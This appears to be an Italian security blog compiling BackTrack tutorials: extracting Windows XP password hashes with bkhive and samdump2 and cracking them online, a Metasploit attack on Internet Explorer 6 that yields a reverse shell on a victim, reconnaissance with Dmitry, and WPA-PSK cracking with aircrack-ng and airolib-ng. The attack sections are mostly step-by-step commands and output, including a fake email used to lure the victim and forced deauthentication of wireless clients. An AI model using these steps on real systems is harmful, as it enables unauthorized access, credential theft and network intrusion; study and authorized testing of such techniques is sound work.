Hacking windows password with BackTrack & Rainbow Tables

Chiedo scusa per la formattazione di questo tutorial , ma l’ ho copiato ed incollato da un mio vecchio paper che comunque per tutti gli interessati è scaricabile
Spero di riuscire presto a farci un video. Per ora , buona lettura.
***
au3-d.png

brigante~ for «Back|Track-[IT]

http://backtrack.it

irc.freenode.net #backtrack.it

***

Hacking Windows password with backtrack and RainbowTables”

Ciao a tutti…

In questo articolo/tutorial , spiegherò uno dei metodi per hackerare la password dell’ admin di un O.S. Windows Xp , dal Live CD di backtrack , usufruendo 1) di due tool , 1a) bkhive , e 1b) samdump2.

e 2) usufruendo anche delle Rainbow Tables direttamente da internet

Iniziamo


—>Una volta avviato il Live CD della nostra backtrack , individuiamo la partizione con la qual il sistema ha riconosciuto il sistema operativo MS Windows XP. , che nel mio caso si tova in /mnt/sda2

(ATTENZIONE!!! non serve fare il mount di nessuna partizione …..sono tutte riconosciute automaticamente!!!)

—>Apriamo una konsole , e spostiamoci nella directory contenente la partizione Windows Xp , dopodiché ci inoltriamo nell’area di registro di windows contenente il files di testo con le password degli utenti e dell’ administrator del sistema criptate.

—>La prima cosa da fare è dare da konsole il comando bkhive , in modo da attivare il programma.

—>Dopodiché nel mio caso da konsole dovrò spostarmi in: /mnt/sda2/WINDOWS/system32/config/ , ma non lo faccio addentrandomi nella directory con il classico comando “cd” , ma immettendo il percorso dopo il comando bkhive , quindi da konsole:

bkhive /mnt/sda2/WINDOWS/system32/config/system key

come potete notare alla fine del percorso ho aggiunto key per fare in modo che bkhive interagisca con la directory e possa così lavorare.

—>Appena eseguito il comando lanciamo un altro programma , il samdump2 , e lo facciamo in questo modo:

samdump2 /mnt/sda2/WINDOWS/system32/config/SAM key

A questo punto ci ritroveremo nella nostra konsole , i nomi degli utenti con le rispettive password criptate in algoritmo lm. E procediamo con il connetterci ad internet , abilitando da konsole il DHCP con i seguenti comandi , (eseguiti per un interfccia che nel mio caso è l’ ethernet: “eth0“)

ifconfig

ifconfig eth0 up

dhcpcd eth0

—>Una volta connessi ad internet inseriamo nel browser quest’ indirizzo http://plain-text.info

e nella parte alta a sinistra del sito , clickiamo su “submit hash”

Inseriamo i dati nella pagina appena aperta e usciamo , aspettando il tempo necessario al nostro riento nel sito e clickando sulla parte alta a asinistra del sito su “View Rainbow Tables” scoveremo la password che corrisponde all’ hash inserito precedentemente…. Tutto quì!

Ciao a tutti , e alla prossima.

Annunci

Metasploit Framework

resource.png

 

Ciao a tutti,

eccoci arrivati alla descrizione di uno strumento che ha praticamente rivoluzionato il mondo della sicurezza informatica , stiamo parlando del progetto “MetaSploitFramework“.

Partiamo però dalla teoria , in modo che tutti possano rendersi conto di quello che sto per descrivervi…

Cos’é il progetto Metasploit?

Metasploit è un progetto nato dall’ unione di più persone appassionate di informatica , di sicurezza e di programmazione , che si sono dedicate a questo progetto per fare in modo che tutti gli amministratori di siti , di interi network , e di importanti o meno portali informatici , possano , tramite l’ uso del framework , proteggersi da malintenzionati , che in un mondo come quello dell’informatica , non mancano mai.

Tramite il progetto metasploit framework , tutti gli amministratori di reti , possono utilizzare e scrivere exploits e shellcode , (o payloads) , e testare facilmente la loro sicurezza in modo da rendersi conto o meno dei vari rischi che possono affliggere le loro reti/applicazioni.

Metasploit framework , vuole quindi essere un progetto che , tramite nuove tecniche di exploit , mira al rafforzamento della sicurezza informatica in generale , fornendo a tutti , nuovi e facilitati strumenti per il pentesting , utilizzabili da chiunque e soprattutto opensource.

Da quello che ho appena detto è facile intendere che se un amministratore si tiene aggiornato tramite questo framework , sarà difficile incappare in scriptkiddies e malintenzionati vari.

Gli strumenti forniti dall’ intero framework sono molti , basta recarsi a questa pagina per vederli tutti , noi naturalmente useremo gli strumenti inseriti in backtrack.

Sottolineare la questione opensource è fondamentale per comprendere il progetto MSF , per il semplice fatto non è l’ unico strumento di questo tipo , ma essendo l’unico opensource , è secondo me , l’unico degno di nota.

Tramite la raccolta , sempre aggiornata di exploit , MSF fornisce uno strumento eccezionale e che , essendo opensource , può arrivare alle porte di tutti gli ineterssati , e data la sua importanza ed efficacia , non poteva mancare in una security-distro come la backtrack , che infatti fornisce di default MSF in tutte le versioni , fin dalla nascita del progetto.

Metasploitframework fornisce una vasta gamma di exploit , che possono sfruttare vulnerabilità che affliggono reti , con tutti i vari tipi di protocolli dal SAMBA alle VPN, database basati su MySQL fino agli Oracle , server Microsoft come anche Apache , Pc che girano con Windows (tutte le versioni di Windows dalla 95 all’ XP) , come anche UNIX Solaris e LINUX , e tantissime applicazioni , dai browser come Firefox fino ad arrivare a Internet Explorer , da RealVNC fino al messanger di Yahoo ; insomma Metasploitframework è un grande progetto che se ben usufruito può dare risultati di protezione eccezionali. I più assidui lettori di advertising e securitynews , già si vedono arrivare advertising con relativi exploits per il pentesting della propria rete , usufruibile appunto tramite il framework Metasploit.

MSF è utilizzabile da diveri O.S. , dai sistemi basati su GNU/Linux , fino ad arrivare a BSD e Windows (quì vi segnalo per coloro che usano sistemi Microsoft una buona guida ) , e parlo sia tramite Shell , (o prompt per gli utenti Windows) , fino all’ utilizzo dell’ interfaccia grafica tramite interprete e librerie Ruby installate.

Nella backtrack attualmente , sono fornite due versioni del progetto MSF , la versione 2 e la 3.

La versione 2 è stata attualmente abbandonata , per far posto alla versione 3 , ma vediamo un pò più da vicino quello che può essere l’ utilizzo del framework.

Innanzitutto voglio dire che la disponibilità degli amministratori di MSF , fornisce a tutti gli strumenti per comprendere il funzionamento del loro progetto , ci sono sul sito ufficiale di MSF tutti gli strumenti necessari per utilizzare il MSF che agli utenti , di backtrack e non , si presenta in 4 maniere di diverso utilizzo :

La MSFconsole , che fornisce appunto l’utilizzo del framework tramite konsole-Terminale-Shell , chiamatela come volete , e che secondo me , data la sua logica e stabilità , è la migliore soluzione , e devo dire che l’impostazione è anche avvastanza userfriendly.

Il MSFweb , che fornisce a tutti coloro che hanno problemi di adeguamento a konsole e terminali , uno strumento tramite interfaccia web , che può per alcuni risultare più familiare , e che è raggiungibile sulla porta 55555 del proprio localhost , praticamente all’indirizzo http://127.0.0.1/55555/

Il MSFgui , ovvero il MSF con interfaccia grafica , (attualmente non utilizzabile in backtrack3beta per la mancanza di librerie , la gnome-gtk2 a me ha dato problemi e non sono riuscito ad avviare MSF anche con interprete Ruby e altre librerie installate).

Il MSFcli , ovvero l’utilizzo di Metasploitframework in modalità konsole , senza l’interattività che invece ha MSFconsole , ma che permette di inviare l’exploit tramite il comando in una sola riga.

Va detto che in backtrack sono inseriti di default altri tools che hanno un metodo di lavoro che usufruisce del Metasploitframework , come Fast-Track e l’ Autopowning , oppure come il nuovo progetto blue-track , ma sono secondo me argomenti che vanno trattati singolarmente e dopo la totale comprensione di MSF.

 

metasploit_logos_main.gif

Come funziona un attacco con Metasploitframework?

L’ attacco tramite il MetaSloitFramework , va eseguito effettuando una serie di passi ,(quì una DEMO online ) che sono:

1) – Individuazione del sistema vittima tramite scansione e relativa scelta e scansione dell’ exploit per la vulnerabilità individuata.

2) – Scelta e configurazione del payload (o shellcode) , da eseguire dopo l’ eventuale successo ottenuto dall’ exploit.

3) – Exploitation , invio dell’ exploit.

Questi sono i processi fondamentali da eseguire , ma non gli unici , comunque vediamoli singolarmente.

L’ individuazione del sistema vittima viene eseguita naturalmente tramite vari strumenti , uno di questi può essere ad esempio uno scanner , e quale scanner più potente , leggero e dettagliato , da inserire all’ interno di un framework se non l’ nmap.

L’ nMap è inserito all’ interno di MSF , e può essere facilmente richiamato tramite il comando nmap , e vedremo che subito ci verranno elencate tutte le opzioni dello scanning , che è solo uno dei tool usufruibili nel framework metasploit.

Una volta individuato il sistema vittima , con tutte le applicazioni e vulnerabilità annesse , bisogna scegliere un exploit.

******************

I tutorial che vengono pubblicati su questo blog , (speriamo di poterlo chiamare presto sito…) , sono tutti testati , e siccome è stato fatto da noi un video a riguardo di un attacco con l’ utilizzo del Metasploitframework , baserò questo articolo/Tutorial sul video che abbiamo fatto , e che potete trovare naturalmente nell’ apposita sezione dei video.

******************

Per lavorare e provare il Metasploitframework , ho selezionato il Framework versione 2 , da:

KDEmenu–>backtrack—>Penetration–>Metasploit Exploitation Framework–>Framework Version 2–>MSFconsole
Per scegliere l’ exploit , ho eseguito il comando che mostra tutti gli exploit disponibili , show exploits.

Riporto solo alcuni screenshots per comodità di spazio…

msf-2.pngmsf-2.pngmsf-3.pngmsf-4.png

Quì ho scelto di usare l’ exploit:“ie_vml_rectfill” , questo , già dal codice , è un exploit che sfrutta una vulnerbilità insita in Internet Explorer alla versione 6 , e che permette all’ attaccante di eseguire del codice sul host della vittima.

un exploit , dopo la scelta , deve essere inserito e configurato , e viene fatta questa operazione tramite il comando use , e come configurazione visto che ogni exploit vuole una configurazione diversa , per farla ho digitato il comando show options , il quale mostra tutte le opzioni necessarie all’ uso dell’ exploit selezionato , e gli obbiettivi/target , a cui l’ exploit può far capo con successo.

il comando che ho dato quindi è (rosso-comando-sistema / nero-comando-utente):

msf > use ie_vml_rectfill

dopodiché per vedere le opzioni di cui l’exploit necessita ho dato il comando show options:

msf ie_vml_rectfill > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
——– ——– ——- —————————-
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port

Payload: Name Default Description
——– ——– ———– ——————————————
required EXITFUNC seh Exit technique: “process”, “thread”, “seh”
required LHOST XX.XXX.X.XX Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows NT 4.0 -> Windows 2003 SP1

msf ie_vml_rectfill(win32_reverse) >

*********************

Apro una piccola parentesi per dire che in ogni momento è possibile richiamare tramite alcuni comandi la lista disponibile di nops , encoders , exploits e di comandi disponibili tramite il comando help.

msf-7.pngmsf-8.pngmsf-7.png

(gli exploits sono stati riportati negli screenshots precedenti…)

***********

Per scegliere il payload diamo il seuente comando:

msf ie_vml_rectfill(win32_reverse) > show payloads

Metasploit Framework Usable Payloads
====================================

win32_downloadexec Windows Executable Download and Execute
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

Questi i payloads disponibili , e da questi non dobbiamo fare altro che selezionarne uno e vedere se necessita di configurazione , quindi con il comando seguente selezioniamo per il nostro attacco il payload: win32_exec , il quale ci consentirà l’esecuzione di comandi tramite il prompt Windows Xp , che è il sistema attaccato.

msf ie_vml_rectfill > set PAYLOAD win32_reverse

una volta eseguita la selezione del payload , come per l’ exploit vediamo le opzioni di cui necessita , diamo quindi il solito comando show option , ottenendo il risultato seguente:

msf ie_vml_rectfill(win32_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
——– ——– ——- —————————-
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port

Payload: Name Default Description
——– ——– ———– ——————————————
required EXITFUNC seh Exit technique: “process”, “thread”, “seh”
required LHOST 29.230.6.74 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows NT 4.0 -> Windows 2003 SP1

Le opzioni de default non vanno bene per il payload che abbiamo selezionato , visto , come ripeto , che è la vittima a connettersi al nostro fake server , allora devo dargli l’indirizzo su cui la vittima si connette e noi riceviamo la sua connessione e lo facciamo con il seguente comando:

msf ie_vml_rectfill(win32_reverse) > set HTTPHOST 29.XXX.6.XX

HTTPHOST -> 29.XXX.6.XX

Ora basta dare il comando exploit ,(colore-blue-prompt-vittima), e guardate voi il risultato ottenuto , (gli IP sono stati mascherti con delle “X”):

msf ie_vml_rectfill(win32_reverse) > exploit


[*] Starting Reverse Handler.
[*] Waiting for connections to http://29.XXX.X.XX:8080/
[*] Client connected from 1.42.XXX.XX:1042…
[*] Got connection from 29.XXX.6.XX:4321 <-> 1.42.XXX.XX:1043

Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\w33dsmok3r\Desktop>

***

metasploit_logos_icbm1.jpg
***

Ed ecco nelle nostre mani il totale controllo del sistema della vittima.

Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\w33dsmok3r\Desktop>exit

exit è stato il comando che io ho dato , perché stiamo facendo un test , ma pensate voi un malintenzionato cosa potrebbe arrivare a fare…

***

Ecco quindi a cosa serve il metasploitframework… …a rendersi immuni da attacchi di malintenzionati , la vittima del nostro attacco infatti , una volta che è venuto a conoscenza della falla di IE-6 , potrebbe benissimo pensare di passare a IE-7 , rendendosi così immune dall’ attacco con l’ exploit che abbiamo scelto in questo tutorial.

Il metasploitframework , è quindi un progetto grandioso , basta farne buon uso. I metodi di attacco a seconda della vittima e dell’ exploit sono molteplici , io al posto di usufruire del payload win32_reverse , avrei potuto ad esempio richiamare il payload win32_reverse_vncinject in questo caso avrei potuto anche ottenere il controllo grafico del sistema della vittima , tramite appunto l’ iniezione del payload di un VNC control , il programma per gestire da remoto un desktop , che però in questo caso sarebbe stato non autorizzato logicamente.

***

Non dobbiamo dimenticare una cosa però , che nel nostro caso è di fondamentale importanza , e cioé la connessione in un host “fake” del sistema vittma , praticamente c’é stata dopo l’ analisi dell’ attacco e la decisione di usare l’ exploit win32_reverse , la decisione di creare una fakemail , che conteneva l’ indirizzo IP dell’ host fake nascosto in un immagine che ha fatto in modo che la vittima si sia connessa al server fake , sul quale poi noi abbiamo ricevuto la connessione della vittima.

L’IP host fake , è stato inserito nella configurazione del exploit con il comando:

msf ie_vml_rectfill(win32_reverse) > set LHOST 29.XXX.6.XX

in questo modo abbiamo ricevuto la connessione , e ci siamo impadroniti del sistema vittima.

***

Come possiamo vedere dagli screenshots che ho fatto gli exploits , i payloads , e le altre istruzioni all’ interno della konsole , ma anche se siha intenzione di usare MSFweb o la gui con MSFgui , sono inserite in modo da essere facilmente riconoscibili…. questo per rendere l’ idea è uno screenshot realizzato per l’ uso di MSFweb.:

msf-11.png

 

msf-12.png

uesto della webinterface però è un uso che consiglio esclusivamente a coloro che devono familiarizzare con il progetto oppure con Shell e konsole , perché altrimenti è facile capire che la prestazione è meno performante.

***

Come possiamo vedere exploits e payloads sono inseriti in stile “exploit – applicazione affetta da vulnerabilità e causa

Infatti se prendiamo il caso da noi analizzato e sfruttato per l’ attacco , possiamo vedere che:

ie_vml_rectfill Internet Explorer VML Fill Method Code Execution

Infatti:

Nome dell’ exploit : ie_vml_rectfill

Applicazione affetta : Internet Explorer

Causa : VML Fill Method Code Execution

Per vedere una scheda più completa riguardante gli exploits di cui possiamo servirci , possiamo sempre connetterci al sito del progetto ed avere così una conoscenza più dettagliata.

Sempre per il nostro caso a questa pagina ci sono tutti i dettagli , anche se non dobbiamo dimenticare che in backtrack è inserito , ma il framework alla versione 2 non è più supportato , quindi non può essere più effettuato nessun UPdate , cosa che deve essere sempre eseguita prima di ogni test , in modo da avere a disposizione tutti gli exploits più nuovi e di sonseguenza più efficaci.

La cosa importante da capire è che digitando il nome dell’ exploit nel motore di ricerca si ottiene come risultato la scheda tecnica dello stesso , e possiamo analizzarlo in tutte le sue caratteristiche , anche per il fatto che dalla pagina dell’ exploit nella scheda del progetto ci sono anche delle referenze a siti esterni come milw0rm e SecurityFocus ,che contegono inoltre anche i link per le rispettive patch.

MetasploitFramework è un progetto troppo grande per essere trattao unicamente in un articolo/tutorial , ed è per questo che abbiamo realizzato un videotutorial e che non sarà l’ unico , anche se tratteremo prossimamente nuovi argomenti importanti , ogni qualvolta che uscirà una qualche novità rispetto al framework saremo lieti di darla e testarla.

All’ interno del nostro BOX , inseriremo tutti i testi possibili per la comprensione di questo stupendo progetto , alcuni saranno anche nostri , ma la maggiorparte provengono come è logico che sia dal sito del progetto Metasploit , che personalmente tengo e consiglio di tenere sott’ occhio.

ciao a tutti e alla prossima.

 

Dmitry

whois.jpg

Ciao a tutti,

oggi scriverò il solito articolo/tutorial introducendo l’ argomentazione di una nuova sezione , (del blog , ma anche di backtrack ) , essenziale per tutti coloro che abitano il mondo della sicurezza informatica , e che in backtrack ci offre tramite i suoi tool numerose possiblità di lavoro , per coloro che dalla foto non l’ avessero ancora capito , sto parlando dell’ “Information Gathering“.

L’Information Gathering , (Raccolta Informazioni ), è uno strumento , o meglio un insieme di strumenti che sono messi a disposizione da internet (inteso come insieme di reti/elementi) , e che aiutano un utente nel cercare informazioni su di cose – persone – host/server/siti …eccetera.

Gli strumenti che a noi utenti di backtrack sono messi a disposizione sono molti , e spero di riuscire pian-piano a farne una guida/descrizione su tutti , uno per uno , e quest’ oggi iniziamo con il descrivere il tool che uso maggiornmente io stesso , e cioé il Dmitry. , che appartiene alla categoria dei Whois.

Vediamo un attimo solo come agisce un whois.

Un whois , (dall’inglese: chi é?) , non è altro che un motore di ricerca , proprio come Google , Yahoo! , Altavista , DeMarco ed altri , che però è orientato alla scansione della rete in base a determinate query , che altro non sono poi che le stringhe , parole , che noi inseriamo all’ interno dei motori di ricerca per effettuare appunto la ricerca di infomazioni.

Il DMitry , (Deepmagic Information Gathering Tool) , è un whois potentissimo , che con una sola ricerca , scritta tramite konsole , (e tutta in una riga…) , riesce a restituirci il maggior numero di informazioni possibili sugli hosts che a noi interessano.

Gli whois sono degli strumenti assolutamente necessari per il pentesting , (basti guardare il tutorial che scrissi sull’ SQL-Injection) , e a mio avviso il Dmitry è tra i migliori in circolazione , tramite delle opzioni da noi inserite secondo il metodo di ricerca da usare , ci restituisce moltissime informazioni sugli hosts.

Dmitry è un programma che lavora esclusivamente da riga di comando , è scritto in C e , cosa fondamentale , è un progetto opensource.

Dmitry ha la capacità di darci su di un determinato host , tantissime informazioni , tutte raccolte ed estratte in base alle nostre richieste , effettuate tramite l’inserimento in Shell di alcune opzioni , ma vediamo come possiamo farne un primo utilizzo.

Dmitry , BackTrack–>Information Gathering–>Whois–>Dmitry , come tutti i programmi da riga di comando e non , gode di molte opzioni , elenchiamole usando il comando dmitry senza opzioni per vederle tutte , ecco cosa viene fuori:

brigante ~HaCkLaB.WiFu # dmitry
Deepmagic Information Gathering Tool
“There be some deep magic going on”

Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
-o Save output to %host.txt or to file specified by -o file
-i Perform a whois lookup on the IP address of a host
-w Perform a whois lookup on the domain name of a host
-n Retrieve Netcraft.com information on a host
-s Perform a search for possible subdomains
-e Perform a search for possible email addresses
-p Perform a TCP port scan on a host
* -f Perform a TCP port scan on a host showing output reporting filtered ports
* -b Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
*Requires the -p flagged to be passed

le opzioni come possiamo vedere sono abbastanza , ma non proprio molte , anche perché vedremo il Dmitry con poche opzioni che razza di lista informazioni ci tirerà fuori , ma descriviamole:

-o , fà in modo che l’ output , il risultato del nostro lavoro tramite il Dmitry , venga salvato in un file , (di solito in /root) , per fare in modo di essere analizzato anche dopo la chiusura della Shell , di nome hosts.txt (può essere comunque rinominato come vogliamo).

-i , ci permette di avere l’ indirizzo IP di un determinato sito internet , di cui noi invece nell’ oipzioni di richiesta al programma abbiamo solo dato il nome , se infatti scriviamo come sito nella riga di comando per il Dmitry http://www.google.com , il risultato dell’ opzione -i sarà: HostIP:209.85.129.147 , ma quest’output lo vedremo nel risultato finale sia in konsole che nel file hosts.txt , file che Dmitry ci andrà a generare quando gli daremo l’ opzione -o hosts.txt , il file verrà salvato in /root epossiamo chiamarlo , magari per far altre ricerche e non andare a sostituire il file precedente , in un altro modo.

-w , esegue una ricerca all’ interno del dominio in questione.

-n , esegue una ricerca usufruendo del servizio Netcraft.com per ricevere ancora maggiori informazioni sull’ host su cui stiamo basando la nostra ricerca.

-s , questa opzione ricerca tutti i subdomini possibili che sono all’ interno dell’ host.

-e , questa opzione invece ricerca tutte gli indirizzi email che fanno capo all’ host.

-p , esegue uno scanning delle porte su protocollo TCP.

-f , questa opzione , esegue la stessa funzione dell’ opzione -p , solo che ci elenca le porte che Dmitry riceve come filtrate all’interno del protocollo TCP dell’ host.

-b, è l’opzione che dice a Dmitry di elencare nell’output tutti i banner dell’ host scannerizzato , che quindi necessita dell’ opzione -p.
-t, invece è l’opzione che setta Dmitry con un tempo limite di scanning per ogni porta TCP. anche quest’ opzione è inseribile solo se è stata già inserita l’opzione -p dello scanning TCP logicamente

Ma facciamo una ricerca completa sul nostro amico Google settando come opzione soloil nome dell’ host e -i per risolvere l’ IP dell’ host.:

[root@bt ~]$ dmitry -i http://www.google.it
Deepmagic Information Gathering Tool
“There be some deep magic going on”

HostIP:209.85.135.147
HostName:www.google.it

Gathered Inet-whois information for 209.85.135.147
———————————

OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

NetRange: 209.85.128.0 – 209.85.255.255
CIDR: 209.85.128.0/17
NetName: GOOGLE
NetHandle: NET-209-85-128-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.GOOGLE.COM
NameServer: NS2.GOOGLE.COM
NameServer: NS3.GOOGLE.COM
NameServer: NS4.GOOGLE.COM
Comment:
RegDate: 2006-01-13
Updated: 2006-06-01

OrgTechHandle: ZG39-ARIN
OrgTechName: Google Inc.
OrgTechPhone: +1-650-318-0200
OrgTechEmail: arin-contact@google.com

# ARIN WHOIS database, last updated 2008-01-25 19:10
# Enter ? for additional hints on searching ARIN’s WHOIS database.

All scans completed, exiting

Se volete chimare Google , fatelo , ma non dite di aver letto quì queste informazioni…. 😀 , scherzo logicamente , ma se volete c’é anche il numero di telefono , quindi fate voi…

…adesso invece andiamo ad aprire il Dmitry per fare una ricerca abbastanza più complessa cercando su http://www.google.com quante più informazioni pssibili , e subito dopo l’ apertura della konsole diamo i seguenti comandi:

[root@bt ~]$ dmitry -winsepffb -o hosts.txt http://www.google.com

dove: “-winsepffb” , è l’ opzione obbligatoria , (basta riferirsi all’ usage per capirlo) , “-o hosts.txt” è l’ opzione che ci andrà a salvare i risultati del whois in un file di testo chiamato appunto “hosts.txt” , e “www.google.com” , è invece il testo riguardante l’ host su cui noi vogliamo fare la ricerca.

E guardate voi che risultato ci restituisce il Dmitry con un comando dato in neanche 10 secondi:

ve la allego in file di testo perché è davvero una lista informazioni enorme.

logo.gif
(cliccate sul file google.txt per vedere il risultato).
***
Ora non voglio fare lo sbalordito , ma mi piacerebbe se qualuno potesse smentirmi…

dove lo trovate voi un tool che in 8/9 secondi ci restituisce una scancione del genere?

In pochissimo tempo Dmitry ci ha dato notizie ed informazioni su Google.com , ha trovato i subdomini , e tutto ciò che poteva interessarci , e poi le opzioni non sono molte , ed è per questo che considero il Dmitry uno strumento fondamentale per il pentesting , anzi credo che se ci si abitua ad usarlo , poi non si sente il bisogno i andare a lavorare con altri whois , almeno per me è così.

ciao a tutti e alla prossima.

WPA Cracking

intro.jpg

Ciao a tutti,
oggi ho ricevuto una mail di brigante~ con linkati alcuni thread sul forum di Remote-Exploit.org iniziati da alcuni tra gli utenti più attivi nello scrivere tutorial e a spiegarci il funzionamento dei tools messi a disposizione da BT3. I thread non mi erano nuovi e considerato che il WPA si appresta a diventare lo standard di sicurezza delle reti WiFi ho pensato di scrivere questo piccolo how-to sul cracking di reti WPA/WPA2 PSK seguendo i thread di -=Xploitz=-, theprez98 e shamanvirtuel presenti su remote-exploit.org.

Affronteremo i diversi approcci al cracking WPA/WPA2 PSK in ordine, analizzando prima l’utilizzo della sola suite di tools Aircrack-ng, poi l’utilizzo di coWPAtty e infine un loro utilizzo combinato. La base comune di tutti questi tutorial è quella di possedere un handshake valido tra il client e l’AP.

Partiamo dalla catturta dell’handshake e alla sua verifica.
Come sempre settiamo l’interfaccia wireless che useremo in monitor mode sul canale dell’AP:

——————————–
airmon-ng start wifi0 11
——————————–
Dunque utilizziamo airodump-ng il lock mode sul canale dal quale trasmette l’AP e facendo modo che filtri solo suo traffico impostando un filtro MAC:
——————————–
airodump-ng –bssid 00:1c:10:90:86:7f –channel 11 -w handshake ath0
——————————–
A differenza del cracking del protocollo WEP, dove per effettuare con successo il cracking non era strettamente necessario individuare un client connesso via wirelss all’AP poichè anche il traffico generato da un client via cavo poteva essere utilizzato, nel cracking WPA dobbiamo per forza avere almeno un client connesso o comunque rimanere in ascolto con airodump-ng fino a che non se ne connette uno.
La necessità di avere un client connesso nasce dal fatto che il cracking WPA è sostanzialmente un brute-force su un pacchetto di autenticazione confrontando l’hash di questo con quello generato da noi, quindi gli unici pacchetti che dobbiamo ottenere sono quelli in fase di handshake tra AP e client senza preoccuparci del traffico in transito sull’AP.
Quando otterrete un handshake valido, Airodump-ng vi informerà della cattura facendo apparire nella sua finestra, in alto a destra, una scritta simile a questa “[ WPA handhsake: 00:1c:10:90:86:7f“.
Se non si connette nessun client durante lo sniffing possiamo deautenticarne uno gia connesso cosi che si riconetta generando i 4 pacchetti che compongono l’handshake, usiamo Aireplay-ng per forzare la disconnessione del client vittima:

——————————–
aireplay-ng -0 10 -a 00:10:1c:90:86:7f -c 00:19:d2:3b:91:85 ath0
——————————–
Ottenuto l’handshake controlliamo che questo sia effettivamente valido con wireshark, quindi aprimo il file generato da airodump-ng con wireshark (Menu–>Backtrack–>Privilege Escalation–>Sniffers–>Wireshark) e controlliamo di aver catturato un handshake completo.

handshake-wireshark.jpg
———————————————————————-
Per cercare più facilmente i pacchetti relativi all’handshake inserite nella casella filtro la parola “eapol“. I pacchetti devono essere in tutto 4, 2 in partenza dall’AP verso il client, e 2 dal client all’AP. Dall’esempio potete vedere che i pacchetti compresi tra il 575 e il 578 rispecchiano le 4 fasi che compongono l’handhsake WPA, e in particolare:
575 –> l’AP inizia l’handshake; nell’etichetta “802.1X Authentication” vedrete una voce chiamata “Replay Counter” settata a 1
576 –> il client risponde al primo pacchetto inviatogli dall’AP, anche qui il replay counter è settato a 1
577 –> ancora è l’AP a iniziare la seconda fase dell’autenticazione, in questo caso il replay counter è settato a 2
578 –> il client a sua volta risponde, il replay counter è 2
In pratica abbiamo 2 coppie di invio/risposta tra AP e client con lo stesso “replay counter”.
Cracking
Visto che si tratta di bruteforcing, partiamo dal recuperare una wordlist per il nostro scopo.
Per il tutorial inseriremo in una wordlist, scaricata dal box del blog, la chiave WPA della nostra rete, cosi da eseguire il tutorial senza troppi problemi; teniamo presente che una wordlist per essere “funzionante” non ha solo bisogno di essere grande, ma anche “adatta” allo scenario; per questo tutorial userò una wordlist molto corta per velocizzarne l’esecuzione di prova.
Dirigiamoci sul box del blog (in alto a destra) e scarichiamo da qui una wordlist, per i test ho utilizzato questa. Quindi scompattiamola con il comando:
—————–
gunzip -d junk.gz
—————–

e editiamola inserendo al suo interno la password della nostra rete in questo modo:
——————–
cat >> junk << “end”
>-=m0r3l337k3y=-
>end
——————–
ovviamente al posto di “-=m0r3l337k3y=-” dovete inserire quella che è la vostra password WPA, quindi stoppate cat inserendo la parola “end”(senza virgolette!).
[AIRCRACK-NG]
Ora iniziamo con il primo metodo di cracking utilizzando esclusivamente Aircrack-ng con la wordlist creata:
————————-
aircrack-ng -w junk -b 00:1c:10:90:86:7f handshake*.cap
————————-

aircrack-crack.jpg
———————————————————————-
-=Xploit=- ha fatto un video tutorial, il link è a questo post del forum di remote-exploit.org
[AIROLIB-NG]
Adesso andremo ad utilizzare un’altro metodo di cracking che sfrutta Airolib-ng per creare un database con al suo interno le password precomputate con l’ESSID della vostra rete, in questo modo Aircrack-ng velocizzerà il lavoro di cracking.
Prima di tutto specifico che per proseguire dovete avere installato SQLite3, se state usando BT3 non avete problemi, è installato di default. Per chi non avesse SQLite3 installato, può installarlo tramite il modulo creato da balding_parrot scaricabile da qui. Installato SQLite3 è necessario installare la versione di Aircrack-ng in fase di sviluppo, qui sul wiki di Aircrack-ng ci sono delle istruzioni dettagliate.
A questo punto passiamo a creare il nostro database con Airolib-ng:
————————-
airolib-ng wpaTestDB init
————————-

Con questo comando andremo a creare un database chiamato “wpaTestDB“. Ora creiamo la lista di ESSID con cui fare il salt delle password, per semplicità e velocità creiamo un file con all’interno solo il nome della nostra rete:
————–
nano essid.txt
————–

un volta aperto il file con nano (se non esiste il file quest’ultimo verrà creato in automatico) inseriamo al suo interno il nome della nostra rete, nel mio caso “trinacria“.
Quindi salviamo premendo “F2” e rispondiamo con “y” seguito dal tasto enter per salvare.
Adesso inseriamo la lista di ESSID presenti nel file appena creato nel database con il comando:
——————————
airolib-ng wpaTestDB import ascii essid essid.txt
——————————

e subito dopo le password:
——————————
airolib-ng wpaTestDB import ascii passwd junk
——————————

Ora procediamo con una pulizia del database in modo che vengano eliminate tutte le chiavi non valide rendendolo cosi più veloce e leggero:
——————————
airolib-ng wpaTestDB clean all
——————————

Adesso creiamo le PMK computando password con essid, tutto questo è fatto in automatico da Airolib-ng con il comando:
————————–
airolib-ng wpaTestDB batch
————————–

airolib-batch.jpg

il tempo impiegato dipende dalla quantità di password inserite e dal numero di essid (1 nel nostro caso) oltre che dal sistema in vostro possesso.
Se volessimo essere sicuri di essere riusciti a creare un database senza errori possiamo utilizzare l’opzione “verify“; in questo modo Airolib-ng effettua una verifica volta ad eliminare ogni PMK che riscontra non valida, il comando per eseguire la verifica:
——————————
airolib-ng wpaTestDB verify all
——————————

se voleste controllare solo un numero random di chiavi non specificate l’opzione “all“.
